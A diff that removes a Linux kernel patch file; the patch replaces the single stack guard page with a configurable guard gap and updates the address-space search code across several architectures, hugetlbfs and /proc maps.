---- a/arch/parisc/kernel/sys_parisc.c
-+++ b/arch/parisc/kernel/sys_parisc.c
-@@ -35,17 +35,27 @@
-
- static unsigned long get_unshared_area(unsigned long addr, unsigned long len)
- {
-- struct vm_area_struct *vma;
-+ struct vm_area_struct *vma, *prev;
-+ unsigned long prev_end;
-
- addr = PAGE_ALIGN(addr);
-
-- for (vma = find_vma(current->mm, addr); ; vma = vma->vm_next) {
-+ for (vma =
find_vma_prev(current->mm, addr, &prev); ; prev = vma,
-+ vma = vma->vm_next) {
-+ if (prev) {
-+ prev_end = vm_end_gap(prev);
-+ if (addr < prev_end) {
-+ addr = prev_end;
-+ /* If vma already violates gap, forget it */
-+ if (vma && addr > vma->vm_start)
-+ addr = vma->vm_start;
-+ }
-+ }
- /* At this point: (!vma || addr < vma->vm_end). */
- if (TASK_SIZE - len < addr)
- return -ENOMEM;
-- if (!vma || addr + len <= vma->vm_start)
-+ if (!vma || addr + len <= vm_start_gap(vma))
- return addr;
-- addr = vma->vm_end;
- }
- }
-
-@@ -70,22 +80,32 @@ static int get_offset(struct address_space *mapping)
- static unsigned long get_shared_area(struct address_space *mapping,
- unsigned long addr, unsigned long len, unsigned long pgoff)
- {
-- struct vm_area_struct *vma;
-+ struct vm_area_struct *vma, *prev;
-+ unsigned long prev_end;
- int offset = mapping ? get_offset(mapping) : 0;
-
- offset = (offset + (pgoff << PAGE_SHIFT)) & 0x3FF000;
-
- addr = DCACHE_ALIGN(addr - offset) + offset;
-
-- for (vma = find_vma(current->mm, addr); ; vma = vma->vm_next) {
-+ for (vma = find_vma_prev(current->mm, addr, &prev); ; prev = vma,
-+ vma = vma->vm_next) {
-+ if (prev) {
-+ prev_end = vm_end_gap(prev);
-+ if (addr < prev_end) {
-+ addr = DCACHE_ALIGN(prev_end - offset) + offset;
-+ if (addr < prev_end) /* handle wraparound */
-+ return -ENOMEM;
-+ /* If vma already violates gap, forget it */
-+ if (vma && addr > vma->vm_start)
-+ addr = vma->vm_start;
-+ }
-+ }
- /* At this point: (!vma || addr < vma->vm_end).
*/
- if (TASK_SIZE - len < addr)
- return -ENOMEM;
-- if (!vma || addr + len <= vma->vm_start)
-+ if (!vma || addr + len <= vm_start_gap(vma))
- return addr;
-- addr = DCACHE_ALIGN(vma->vm_end - offset) + offset;
-- if (addr < vma->vm_end) /* handle wraparound */
-- return -ENOMEM;
- }
- }
-
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index 73709f7..57654c9 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -98,7 +98,7 @@ static int slice_area_is_free(struct mm_struct *mm, unsigned long addr,
- if ((mm->task_size - len) < addr)
- return 0;
- vma = find_vma(mm, addr);
-- return (!vma || (addr + len) <= vma->vm_start);
-+ return (!vma || (addr + len) <= vm_start_gap(vma));
- }
-
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-@@ -227,7 +227,7 @@ static unsigned long slice_find_area_bottomup(struct mm_struct *mm,
- int psize, int use_cache)
- {
- struct vm_area_struct *vma;
-- unsigned long start_addr, addr;
-+ unsigned long start_addr, addr, vm_start;
- struct slice_mask mask;
- int pshift = max_t(int, mmu_psize_defs[psize].shift, PAGE_SHIFT);
-
-@@ -256,7 +256,9 @@ full_search:
- addr = _ALIGN_UP(addr + 1, 1ul << SLICE_HIGH_SHIFT);
- continue;
- }
-- if (!vma || addr + len <= vma->vm_start) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (!vma || addr + len <= vm_start) {
- /*
- * Remember the place where we stopped the search:
- */
-@@ -264,8 +266,8 @@ full_search:
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (use_cache && (addr + mm->cached_hole_size) < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (use_cache && (addr + mm->cached_hole_size) < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
- addr = vma->vm_end;
- }
-
-@@ -284,7 +286,7 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- int psize, int use_cache)
- {
- struct vm_area_struct *vma;
-- unsigned long addr;
-+ unsigned long addr, vm_start;
- struct slice_mask mask;
-
int pshift = max_t(int, mmu_psize_defs[psize].shift, PAGE_SHIFT);
-
-@@ -336,7 +338,9 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- * return with success:
- */
- vma = find_vma(mm, addr);
-- if (!vma || (addr + len) <= vma->vm_start) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (!vma || (addr + len) <= vm_start) {
- /* remember the address as a hint for next time */
- if (use_cache)
- mm->free_area_cache = addr;
-@@ -344,11 +348,11 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- }
-
- /* remember the largest hole we saw so far */
-- if (use_cache && (addr + mm->cached_hole_size) < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (use_cache && (addr + mm->cached_hole_size) < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = vma->vm_start;
-+ addr = vm_start;
- }
-
- /*
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index afeb710..22eff46 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -47,7 +47,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- struct mm_struct *mm = current->mm;
- struct vm_area_struct *vma;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
- int do_colour_align;
-
- if (flags & MAP_FIXED) {
-@@ -75,7 +75,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -106,15 +106,17 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (likely(!vma || addr + len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /*
- * Remember the place where we stopped the search:
- */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
--
mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- addr = vma->vm_end;
- if (do_colour_align)
-@@ -130,6 +132,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- struct vm_area_struct *vma;
- struct mm_struct *mm = current->mm;
- unsigned long addr = addr0;
-+ unsigned long vm_start;
- int do_colour_align;
-
- if (flags & MAP_FIXED) {
-@@ -158,7 +161,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -179,7 +182,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- /* make sure it can fit in the remaining address space */
- if (likely(addr > len)) {
- vma = find_vma(mm, addr-len);
-- if (!vma || addr <= vma->vm_start) {
-+ if (!vma || addr <= vm_start_gap(vma)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr-len);
- }
-@@ -199,20 +202,22 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- * return with success:
- */
- vma = find_vma(mm, addr);
-- if (likely(!vma || addr+len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr);
- }
-
- /* remember the largest hole we saw so far */
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = vma->vm_start-len;
-+ addr = vm_start-len;
- if (do_colour_align)
- addr = COLOUR_ALIGN_DOWN(addr, pgoff);
-- } while (likely(len < vma->vm_start));
-+ } while
(likely(len < vm_start));
-
- bottomup:
- /*
-diff --git a/arch/sparc/kernel/sys_sparc_32.c b/arch/sparc/kernel/sys_sparc_32.c
-index 42b282f..eeae89b 100644
---- a/arch/sparc/kernel/sys_sparc_32.c
-+++ b/arch/sparc/kernel/sys_sparc_32.c
-@@ -71,7 +71,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- }
- if (TASK_SIZE - PAGE_SIZE - len < addr)
- return -ENOMEM;
-- if (!vmm || addr + len <= vmm->vm_start)
-+ if (!vmm || addr + len <= vm_start_gap(vmm))
- return addr;
- addr = vmm->vm_end;
- if (flags & MAP_SHARED)
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index a062fe9..39f4999 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -117,7 +117,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- struct mm_struct *mm = current->mm;
- struct vm_area_struct * vma;
- unsigned long task_size = TASK_SIZE;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
- int do_color_align;
-
- if (flags & MAP_FIXED) {
-@@ -147,7 +147,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
-
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -181,15 +181,17 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (likely(!vma || addr + len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /*
- * Remember the place where we stopped the search:
- */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- addr = vma->vm_end;
- if (do_color_align)
-@@ -205,7 +207,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const
unsigned long addr0,
- struct vm_area_struct *vma;
- struct mm_struct *mm = current->mm;
- unsigned long task_size = STACK_TOP32;
-- unsigned long addr = addr0;
-+ unsigned long addr = addr0, vm_start;
- int do_color_align;
-
- /* This should only ever run for 32-bit processes. */
-@@ -237,7 +239,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
-
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -258,7 +260,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- /* make sure it can fit in the remaining address space */
- if (likely(addr > len)) {
- vma = find_vma(mm, addr-len);
-- if (!vma || addr <= vma->vm_start) {
-+ if (!vma || addr <= vm_start_gap(vma)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr-len);
- }
-@@ -278,20 +280,22 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- * return with success:
- */
- vma = find_vma(mm, addr);
-- if (likely(!vma || addr+len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr);
- }
-
- /* remember the largest hole we saw so far */
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = vma->vm_start-len;
-+ addr = vm_start - len;
- if (do_color_align)
- addr = COLOUR_ALIGN_DOWN(addr, pgoff);
-- } while (likely(len < vma->vm_start));
-+ } while (likely(len < vm_start));
-
- bottomup:
- /*
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 07e1453..e13e85d 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -33,7 +33,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *filp,
- struct mm_struct *mm = current->mm;
- struct vm_area_struct * vma;
- unsigned long task_size = TASK_SIZE;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
-
- if (test_thread_flag(TIF_32BIT))
- task_size = STACK_TOP32;
-@@ -67,15 +67,17 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (likely(!vma || addr + len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /*
- * Remember the place where we stopped the search:
- */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- addr = ALIGN(vma->vm_end, HPAGE_SIZE);
- }
-@@ -90,6 +92,7 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- struct vm_area_struct *vma;
- struct mm_struct *mm = current->mm;
- unsigned long addr = addr0;
-+ unsigned long vm_start;
-
- /* This should only ever run for 32-bit processes.
*/
- BUG_ON(!test_thread_flag(TIF_32BIT));
-@@ -106,7 +109,7 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- /* make sure it can fit in the remaining address space */
- if (likely(addr > len)) {
- vma = find_vma(mm, addr-len);
-- if (!vma || addr <= vma->vm_start) {
-+ if (!vma || addr <= vm_start_gap(vma)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr-len);
- }
-@@ -124,18 +127,20 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- * return with success:
- */
- vma = find_vma(mm, addr);
-- if (likely(!vma || addr+len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /* remember the address as a hint for next time */
- return (mm->free_area_cache = addr);
- }
-
- /* remember the largest hole we saw so far */
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = (vma->vm_start-len) & HPAGE_MASK;
-- } while (likely(len < vma->vm_start));
-+ addr = (vm_start - len) & HPAGE_MASK;
-+ } while (likely(len < vm_start));
-
- bottomup:
- /*
-@@ -182,7 +187,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- addr = ALIGN(addr, HPAGE_SIZE);
- vma = find_vma(mm, addr);
- if (task_size - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 42cfcba..184e033 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -159,7 +159,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *file,
- struct hstate *h = hstate_file(file);
- struct mm_struct *mm =
current->mm;
- struct vm_area_struct *vma;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
-
- if (len > mm->cached_hole_size) {
- start_addr = mm->free_area_cache;
-@@ -185,12 +185,14 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (!vma || addr + len <= vma->vm_start) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (!vma || addr + len <= vm_start) {
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
- addr = ALIGN(vma->vm_end, huge_page_size(h));
- }
- }
-@@ -204,6 +206,7 @@ static unsigned long hugetlb_get_unmapped_area_topdown(struct file *file,
- struct vm_area_struct *vma, *prev_vma;
- unsigned long base = mm->mmap_base, addr = addr0;
- unsigned long largest_hole = mm->cached_hole_size;
-+ unsigned long vm_start;
- int first_time = 1;
-
- /* don't allow allocations above current base */
-@@ -234,9 +237,10 @@ try_again:
-
- /*
- * new region fits between prev_vma->vm_end and
-- * vma->vm_start, use it:
-+ * vm_start, use it:
- */
-- if (addr + len <= vma->vm_start &&
-+ vm_start = vm_start_gap(vma);
-+ if (addr + len <= vm_start &&
- (!prev_vma || (addr >= prev_vma->vm_end))) {
- /* remember the address as a hint for next time */
- mm->cached_hole_size = largest_hole;
-@@ -251,13 +255,13 @@ try_again:
- }
-
- /* remember the largest hole we saw so far */
-- if (addr + largest_hole < vma->vm_start)
-- largest_hole = vma->vm_start - addr;
-+ if (addr + largest_hole < vm_start)
-+ largest_hole = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = (vma->vm_start - len) & huge_page_mask(h);
-+ addr = (vm_start - len) & huge_page_mask(h);
-
-- } while (len <= vma->vm_start);
-+ } while (len <= vm_start);
-
- fail:
- /*
-@@ -312,7 +316,7 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- addr =
ALIGN(addr, huge_page_size(h));
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index cdb2fc9..0dbfff8 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -126,7 +126,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- struct mm_struct *mm = current->mm;
- struct vm_area_struct *vma;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
- unsigned long begin, end;
-
- if (flags & MAP_FIXED)
-@@ -141,7 +141,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- addr = PAGE_ALIGN(addr);
- vma = find_vma(mm, addr);
- if (end - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (((flags & MAP_32BIT) || test_thread_flag(TIF_IA32))
-@@ -172,15 +172,17 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (!vma || addr + len <= vma->vm_start) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (!vma || addr + len <= vm_start) {
- /*
- * Remember the place where we stopped the search:
- */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- addr = vma->vm_end;
- addr = align_addr(addr, filp, 0);
-@@ -196,6 +198,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- struct vm_area_struct *vma;
- struct mm_struct *mm = current->mm;
- unsigned long addr = addr0;
-+ unsigned long vm_start;
-
- /* requested length too big for entire address space */
- if (len > TASK_SIZE)
-@@ -213,7 +216,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const
unsigned long addr0, - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -232,7 +235,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - ALIGN_TOPDOWN); - - vma = find_vma(mm, tmp_addr); -- if (!vma || tmp_addr + len <= vma->vm_start) -+ if (!vma || tmp_addr + len <= vm_start_gap(vma)) - /* remember the address as a hint for next time */ - return mm->free_area_cache = tmp_addr; - } -@@ -251,17 +254,19 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - * return with success: - */ - vma = find_vma(mm, addr); -- if (!vma || addr+len <= vma->vm_start) -+ if (vma) -+ vm_start = vm_start_gap(vma); -+ if (!vma || addr + len <= vm_start) - /* remember the address as a hint for next time */ - return mm->free_area_cache = addr; - - /* remember the largest hole we saw so far */ -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; - - /* try just below the current vma->vm_start */ -- addr = vma->vm_start-len; -- } while (len < vma->vm_start); -+ addr = vm_start - len; -+ } while (len < vm_start); - - bottomup: - /* -diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c -index df7d12c..67b8760 100644 ---- a/arch/x86/mm/hugetlbpage.c -+++ b/arch/x86/mm/hugetlbpage.c -@@ -277,7 +277,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *file, - struct hstate *h = hstate_file(file); - struct mm_struct *mm = current->mm; - struct vm_area_struct *vma; -- unsigned long start_addr; -+ unsigned long start_addr, vm_start; - - if (len > mm->cached_hole_size) { - start_addr = mm->free_area_cache; -@@ -303,12 +303,14 @@ full_search: - } - return -ENOMEM; - } -- if (!vma || addr + len <= vma->vm_start) { -+ if (vma) 
-+ vm_start = vm_start_gap(vma); -+ if (!vma || addr + len <= vm_start) { - mm->free_area_cache = addr + len; - return addr; - } -- if (addr + mm->cached_hole_size < vma->vm_start) -- mm->cached_hole_size = vma->vm_start - addr; -+ if (addr + mm->cached_hole_size < vm_start) -+ mm->cached_hole_size = vm_start - addr; - addr = ALIGN(vma->vm_end, huge_page_size(h)); - } - } -@@ -322,6 +324,7 @@ static unsigned long hugetlb_get_unmapped_area_topdown(struct file *file, - struct vm_area_struct *vma, *prev_vma; - unsigned long base = mm->mmap_base, addr = addr0; - unsigned long largest_hole = mm->cached_hole_size; -+ unsigned long vm_start; - int first_time = 1; - - /* don't allow allocations above current base */ -@@ -351,7 +354,8 @@ try_again: - * new region fits between prev_vma->vm_end and - * vma->vm_start, use it: - */ -- if (addr + len <= vma->vm_start && -+ vm_start = vm_start_gap(vma); -+ if (addr + len <= vm_start && - (!prev_vma || (addr >= prev_vma->vm_end))) { - /* remember the address as a hint for next time */ - mm->cached_hole_size = largest_hole; -@@ -365,12 +369,12 @@ try_again: - } - - /* remember the largest hole we saw so far */ -- if (addr + largest_hole < vma->vm_start) -- largest_hole = vma->vm_start - addr; -+ if (addr + largest_hole < vm_start) -+ largest_hole = vm_start - addr; - - /* try just below the current vma->vm_start */ -- addr = (vma->vm_start - len) & huge_page_mask(h); -- } while (len <= vma->vm_start); -+ addr = (vm_start - len) & huge_page_mask(h); -+ } while (len <= vm_start); - - fail: - /* -@@ -426,7 +430,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c -index 5557332..99c51d6 100644 ---- 
a/fs/hugetlbfs/inode.c -+++ b/fs/hugetlbfs/inode.c -@@ -150,7 +150,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -176,7 +176,7 @@ full_search: - return -ENOMEM; - } - -- if (!vma || addr + len <= vma->vm_start) -+ if (!vma || addr + len <= vm_start_gap(vma)) - return addr; - addr = ALIGN(vma->vm_end, huge_page_size(h)); - } -diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c -index de404f2..6037a13 100644 ---- a/fs/proc/task_mmu.c -+++ b/fs/proc/task_mmu.c -@@ -230,11 +230,7 @@ static void show_map_vma(struct seq_file *m, struct vm_area_struct *vma) - - /* We don't show the stack guard page in /proc/maps */ - start = vma->vm_start; -- if (stack_guard_page_start(vma, start)) -- start += PAGE_SIZE; - end = vma->vm_end; -- if (stack_guard_page_end(vma, end)) -- end -= PAGE_SIZE; - - seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu %n", - start, -diff --git a/include/linux/mm.h b/include/linux/mm.h -index 16394da..19f9043 100644 ---- a/include/linux/mm.h -+++ b/include/linux/mm.h -@@ -1015,34 +1015,6 @@ int set_page_dirty(struct page *page); - int set_page_dirty_lock(struct page *page); - int clear_page_dirty_for_io(struct page *page); - --/* Is the vma a continuation of the stack vma above it? */ --static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN); --} -- --static inline int stack_guard_page_start(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSDOWN) && -- (vma->vm_start == addr) && -- !vma_growsdown(vma->vm_prev, addr); --} -- --/* Is the vma a continuation of the stack vma below it? 
*/ --static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP); --} -- --static inline int stack_guard_page_end(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSUP) && -- (vma->vm_end == addr) && -- !vma_growsup(vma->vm_next, addr); --} -- - extern unsigned long move_page_tables(struct vm_area_struct *vma, - unsigned long old_addr, struct vm_area_struct *new_vma, - unsigned long new_addr, unsigned long len); -@@ -1462,6 +1434,7 @@ unsigned long ra_submit(struct file_ra_state *ra, - struct address_space *mapping, - struct file *filp); - -+extern unsigned long stack_guard_gap; - /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */ - extern int expand_stack(struct vm_area_struct *vma, unsigned long address); - -@@ -1490,6 +1463,30 @@ static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * m - return vma; - } - -+static inline unsigned long vm_start_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_start = vma->vm_start; -+ -+ if (vma->vm_flags & VM_GROWSDOWN) { -+ vm_start -= stack_guard_gap; -+ if (vm_start > vma->vm_start) -+ vm_start = 0; -+ } -+ return vm_start; -+} -+ -+static inline unsigned long vm_end_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_end = vma->vm_end; -+ -+ if (vma->vm_flags & VM_GROWSUP) { -+ vm_end += stack_guard_gap; -+ if (vm_end < vma->vm_end) -+ vm_end = -PAGE_SIZE; -+ } -+ return vm_end; -+} -+ - static inline unsigned long vma_pages(struct vm_area_struct *vma) - { - return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT; -diff --git a/mm/memory.c b/mm/memory.c -index 2917e9b..6325103d 100644 ---- a/mm/memory.c -+++ b/mm/memory.c -@@ -1605,12 +1605,6 @@ no_page_table: - return page; - } - --static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr) --{ -- return stack_guard_page_start(vma, addr) || -- 
stack_guard_page_end(vma, addr+PAGE_SIZE); --} -- - /** - * __get_user_pages() - pin user pages in memory - * @tsk: task_struct of target task -@@ -1761,11 +1755,6 @@ int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm, - int ret; - unsigned int fault_flags = 0; - -- /* For mlock, just skip the stack guard page. */ -- if (foll_flags & FOLL_MLOCK) { -- if (stack_guard_page(vma, start)) -- goto next_page; -- } - if (foll_flags & FOLL_WRITE) - fault_flags |= FAULT_FLAG_WRITE; - if (nonblocking) -@@ -3122,40 +3111,6 @@ out_release: - } - - /* -- * This is like a special single-page "expand_{down|up}wards()", -- * except we must first make sure that 'address{-|+}PAGE_SIZE' -- * doesn't hit another vma. -- */ --static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address) --{ -- address &= PAGE_MASK; -- if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) { -- struct vm_area_struct *prev = vma->vm_prev; -- -- /* -- * Is there a mapping abutting this one below? -- * -- * That's only ok if it's the same stack mapping -- * that has gotten split.. -- */ -- if (prev && prev->vm_end == address) -- return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM; -- -- return expand_downwards(vma, address - PAGE_SIZE); -- } -- if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) { -- struct vm_area_struct *next = vma->vm_next; -- -- /* As VM_GROWSDOWN but s/below/above/ */ -- if (next && next->vm_start == address + PAGE_SIZE) -- return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM; -- -- return expand_upwards(vma, address + PAGE_SIZE); -- } -- return 0; --} -- --/* - * We enter with non-exclusive mmap_sem (to exclude vma changes, - * but allow concurrent faults), and pte mapped but not yet locked. - * We return with mmap_sem still held, but pte unmapped and unlocked. 
